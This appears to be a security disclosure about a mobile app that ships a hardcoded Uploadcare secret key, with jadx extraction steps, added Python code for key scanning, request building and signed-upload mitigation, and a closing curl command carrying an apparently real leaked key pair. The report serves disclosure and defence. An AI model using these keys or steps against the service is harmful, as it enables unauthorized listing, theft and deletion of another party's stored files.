Description

The Android application campusconnect.ucc version 14.3.5 ships an Uploadcare secret (private) key, together with its public key, as a string constant in campusconnect/BuildConfig.java. Anyone who decompiles the APK obtains the key pair and can call the Uploadcare REST API directly, with no authentication against the application itself, to list, download, upload, and delete arbitrary files in the project's storage. This can disclose sensitive files and cause permanent data loss. An attacker can also upload arbitrary content to the project; if the backing web server later downloads and processes such a file, the impact could extend to remote code execution, depending on how the server handles it.

Steps to Reproduce

  1. Decompile the APK using jadx
  2. Navigate to sources/campusconnect/BuildConfig.java and extract the hardcoded Uploadcare keys.


  3. View stored files: Use the extracted keys to list existing files in the Uploadcare bucket.
  4. Upload a file: Upload a test file (e.g., test.php). The response will return the file UUID.
  5. Delete a file: Use the file UUID obtained from the upload response or file list to delete a file.
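Step 2 (pulling the keys out of the decompiled sources) is worth automating, both for triage across many APKs and as a build-time check that a key does not come back. The following is an added example, not code from the report or the app: it scans a jadx output tree for String constants that are either named like an Uploadcare key or shaped like one (20 lowercase hex characters, the shape of the pair in the PoC header). The BuildConfig.java sample is constructed for the example; its field names and key values are made up, not the app's real ones.

```python
import re
from pathlib import Path

# Assigned String constants exactly as jadx prints them in BuildConfig.java.
CONST_RE = re.compile(r'static\s+final\s+String\s+(\w+)\s*=\s*"([^"]*)"')
# Uploadcare public and secret keys are 20 lowercase hex characters
# (the pair in the PoC header has that shape).
KEY_RE = re.compile(r'^[0-9a-f]{20}$')

# Constructed sample in the shape jadx emits; field names and key values are
# invented for the example and are not the app's real ones.
SAMPLE_BUILDCONFIG = '''\
package campusconnect;

public final class BuildConfig {
    public static final String APPLICATION_ID = "campusconnect.ucc";
    public static final boolean DEBUG = false;
    public static final String VERSION_NAME = "14.3.5";
    public static final String UPLOADCARE_PUBLIC_KEY = "0123456789abcdef0123";
    public static final String UPLOADCARE_SECRET_KEY = "fedcba9876543210fedc";
}
'''


def find_suspect_constants(java_source: str) -> list:
    """Return (name, value) pairs that are either named like an Uploadcare key
    or shaped like one. Matching on shape catches keys hidden behind bland
    names such as API_KEY; matching on name catches keys that are not hex."""
    hits = []
    for name, value in CONST_RE.findall(java_source):
        if "UPLOADCARE" in name.upper() or KEY_RE.match(value):
            hits.append((name, value))
    return hits


def scan_tree(root: Path) -> dict:
    """Walk a jadx output directory (e.g. its sources/ folder) and report every
    .java file carrying suspect constants, keyed by file path."""
    findings = {}
    for path in root.rglob("*.java"):
        hits = find_suspect_constants(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:               # e.g. python scan.py jadx_out/sources
        for path, hits in scan_tree(Path(sys.argv[1])).items():
            for name, value in hits:
                print(f"{path}: {name} = {value[:6]}...")
    else:                               # demo on the constructed sample
        print(find_suspect_constants(SAMPLE_BUILDCONFIG))
```

Run it against the jadx output directory to list every file and constant that needs attention; the same function dropped into CI over the app's own source tree (not the decompiled one) fails the build before a key can reach a release APK.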

Video Proof of Concept

poc_campusconnect_ucc.gif

The video demonstrates executing the three curl commands: listing existing files, uploading a test file (test.php), and deleting the uploaded file. The responses confirm successful API interactions, proving that the leaked private key allows unauthorized file operations on the Uploadcare storage.

Principle

The app embeds an Uploadcare secret (private) key along with the matching public key. Together they are the credential for the Uploadcare REST API: in the Uploadcare.Simple scheme used in the PoC, the Authorization header carries both keys verbatim, and in the signed Uploadcare scheme the secret key is the HMAC key that signs every request. Either way, whoever holds the pair is indistinguishable from the legitimate backend and can list, upload, download, and delete any file in the project's storage. A mobile binary is public by definition, so a secret placed in BuildConfig.java is not a secret: string constants survive ProGuard/R8 obfuscation unchanged and are one jadx run away. If the server later downloads and processes a file the attacker uploaded, this could lead to remote code execution.
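To make the credential flow concrete, here is an added example (not the report's or Uploadcare's own code) that builds the Authorization header in both schemes and assembles the list and delete requests from the PoC as dry-run (method, url, headers) tuples, so the request shape can be inspected without touching the network. The keys are placeholders; the signed-scheme sign string follows the REST API reference, and the delete path is assumed to be the v0.6 one. The upload step is omitted because it does not go through api.uploadcare.com at all: it posts to the Upload API with the public key only.

```python
import hashlib
import hmac
import urllib.request
from email.utils import formatdate
from urllib.parse import urlencode

API = "https://api.uploadcare.com"
ACCEPT = "application/vnd.uploadcare-v0.6+json"


def simple_auth(public_key: str, secret_key: str) -> str:
    """'Uploadcare.Simple' scheme, the one the PoC curl uses: the secret key
    itself is sent in the Authorization header on every request."""
    return f"Uploadcare.Simple {public_key}:{secret_key}"


def signed_auth(public_key: str, secret_key: str, method: str, uri: str,
                body: bytes = b"", content_type: str = "application/json",
                date: str = "") -> tuple:
    """'Uploadcare' scheme: the secret key never travels; it keys an HMAC-SHA1
    over method, MD5(body), content type, RFC 2822 date and request URI
    (sign string as documented in the REST API reference). A leaked secret is
    just as fatal here, because whoever holds it can sign arbitrary requests."""
    date = date or formatdate(usegmt=True)
    content_md5 = hashlib.md5(body).hexdigest()
    sign_string = "\n".join([method, content_md5, content_type, date, uri])
    sig = hmac.new(secret_key.encode(), sign_string.encode(), hashlib.sha1).hexdigest()
    return f"Uploadcare {public_key}:{sig}", date


def list_files(public_key: str, secret_key: str, limit: int = 1) -> tuple:
    """PoC step 'View stored files' as a (method, url, headers) tuple."""
    uri = "/files/?" + urlencode({"limit": limit})
    headers = {"Accept": ACCEPT, "Authorization": simple_auth(public_key, secret_key)}
    return "GET", API + uri, headers


def delete_file(public_key: str, secret_key: str, uuid: str) -> tuple:
    """PoC step 'Delete a file'. Path assumed from the v0.6 reference (older
    API versions use DELETE /files/{uuid}/). The signed scheme is used here
    so both header forms appear; Date and Content-Type must match the signed
    values."""
    uri = f"/files/{uuid}/storage/"
    auth, date = signed_auth(public_key, secret_key, "DELETE", uri)
    headers = {"Accept": ACCEPT, "Authorization": auth, "Date": date,
               "Content-Type": "application/json"}
    return "DELETE", API + uri, headers


def send(method: str, url: str, headers: dict) -> tuple:
    """Perform a built request; only this function touches the network."""
    req = urllib.request.Request(url, method=method, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode()


if __name__ == "__main__":
    # Placeholder keys; substitute the extracted pair to reproduce the report.
    pub, sec = "0123456789abcdef0123", "fedcba9876543210fedc"
    for method, url, headers in (list_files(pub, sec),
                                 delete_file(pub, sec, "00000000-0000-0000-0000-000000000000")):
        print(method, url)
        print("  Authorization:", headers["Authorization"])
```

Note what the signed scheme does and does not buy: it keeps the secret off the wire, which matters against network observers, but it does nothing against this bug, since the signer is the leaked secret itself. Rotating the pair is the only thing that invalidates what the attacker holds.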

Mitigation

Rotate the key pair in the Uploadcare project settings first, so the leaked credentials stop working, then remove the hardcoded keys from the app source and ship an update; doing it in the other order leaves the old pair valid for every user still on 14.3.5. Move every Uploadcare REST API call to a backend that the app authenticates to, and have that backend enforce authorization (which user may list, download, or delete which file). For uploads, enable signed uploads in the Uploadcare project and have the backend issue short-lived upload signatures, so the client never needs the secret key; note that without signed uploads the public key alone is enough to upload to the project. On the backend, keep the secret key in an environment variable or a dedicated secrets manager, never in source control, and add a secret-scanning check to the build so a key cannot be re-introduced into BuildConfig.
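The backend-side replacement for the hardcoded secret, as an added example rather than the project's code: the server keeps the Uploadcare secret (read from an environment variable here, an assumption about deployment) and hands the authenticated app a short-lived upload signature. The signature format follows Uploadcare's signed-uploads scheme, HMAC-SHA256 keyed with the secret over the expiry timestamp; the client forwards the three fields to the Upload API and never sees the secret. The verify function is included so the expiry and tamper behaviour can be exercised locally; in production Uploadcare performs that check.

```python
import hashlib
import hmac
import os
import time

SIGNATURE_TTL = 600  # seconds; short enough that a captured token is nearly useless


def make_upload_signature(secret_key: str, expire: int) -> str:
    """Uploadcare signed-uploads signature: HMAC-SHA256(secret, str(expire))
    as lowercase hex. Only the backend holds secret_key."""
    return hmac.new(secret_key.encode(), str(expire).encode(), hashlib.sha256).hexdigest()


def issue_upload_token(public_key: str, secret_key: str,
                       now: float = None, ttl: int = SIGNATURE_TTL) -> dict:
    """Fields the client posts to the Upload API alongside the file. The public
    key is safe to expose; the signature is bound to 'expire' and nothing else,
    so keep ttl small."""
    expire = int(now if now is not None else time.time()) + ttl
    return {
        "UPLOADCARE_PUB_KEY": public_key,
        "signature": make_upload_signature(secret_key, expire),
        "expire": expire,
    }


def verify_upload_signature(secret_key: str, signature: str, expire: int, now: float) -> bool:
    """Local model of the check the upload service performs: reject expired
    tokens and any signature that does not match this secret and expiry."""
    if now >= expire:
        return False
    return hmac.compare_digest(make_upload_signature(secret_key, expire), signature)


def handle_token_request(user_authenticated: bool) -> dict:
    """Hypothetical backend endpoint: the app must first authenticate as a user
    of the application, then gets a token. Contrast with the vulnerable state,
    where BuildConfig.UPLOADCARE_SECRET_KEY let anyone skip this step."""
    if not user_authenticated:
        raise PermissionError("login required before an upload token is issued")
    public_key = os.environ["UPLOADCARE_PUBLIC_KEY"]   # assumption: injected at deploy time
    secret_key = os.environ["UPLOADCARE_SECRET_KEY"]   # never in the APK, never in git
    return issue_upload_token(public_key, secret_key)


if __name__ == "__main__":
    # Placeholder keys for a stand-alone run.
    token = issue_upload_token("0123456789abcdef0123", "fedcba9876543210fedc")
    print(token)
```

Listing, downloading and deleting stay entirely behind the backend: the app asks the backend for "my files" or "delete this UUID", and the backend checks ownership before it calls the REST API with the secret. Only uploads need a token at all, and that token cannot list or delete anything.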

PoC

View stored files

curl -H "Accept: application/vnd.uploadcare-v0.6+json" \
     -H "Authorization: Uploadcare.Simple 00f6038c401a780fa3ea:71bc3dee7dd1e6280fe5" \
     "https://api.uploadcare.com/files/?limit=1"

Upload a file